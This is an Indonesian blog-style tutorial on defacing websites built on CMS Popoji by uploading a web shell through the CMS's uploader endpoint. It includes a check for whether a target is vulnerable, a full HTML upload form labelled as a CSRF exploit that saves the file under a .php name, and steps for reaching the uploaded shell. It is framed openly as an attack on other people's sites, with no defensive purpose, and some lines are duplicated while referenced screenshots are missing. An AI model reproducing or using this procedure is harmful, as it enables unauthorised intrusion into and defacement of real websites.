Sesuai Janji Saya, kali ini saya akan membeberkan cara mengupload shell di Cms Popoji.
Tanpa banyak basa-basi, lanjut Tutorial :
Sesudah anda Log-in ke website target agar dapat masuk ke dashboard admin website, silahkan masuk untuk yang belum Tahu CARA DEFACE WEBSITE MENGGUNAKAN CMS POPOJI
Jika sudah masuk, masukan URL bug/vuln dengan :
target.co.id/po-admin/js/plugins/uploader/upload.php
target.co.id/po-admin/js/plugins/uploader/upload.php
Jika terdapat text :
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}
Itu tandanya Web target Vuln.
CSRF Code:
<form method="post" action="target.co.id/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_anda.php">
<input type="submit" value="exploit">
</form>
<form method="post" action="target.co.id/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_anda.php">
<input type="submit" value="exploit">
</form>
(Masukan Script diatas ke Notepad lalu Save As : "CSRF.html")
kemudian buka CSRF.html nya dengan Search Engine anda
Upload Shell anda dengan ekstensi ".Jpg"
Lalu akses URL : "target.co.id/po-content/po-upload/"
Jika tampilan "Forbidden" maka itu diluar kemampuan saya hehe
Sesudah anda upload Shellnya maka besar kemungkinan tampilan nya seperti :
Lalu pilih Shell anda yang ada di list seperti diatas.
Maka tampilan Menjadi seperti ini :
Selesai. Semoga bermanfaat guys :)
Tunggu Cara Instal Cms Popojinya yaa...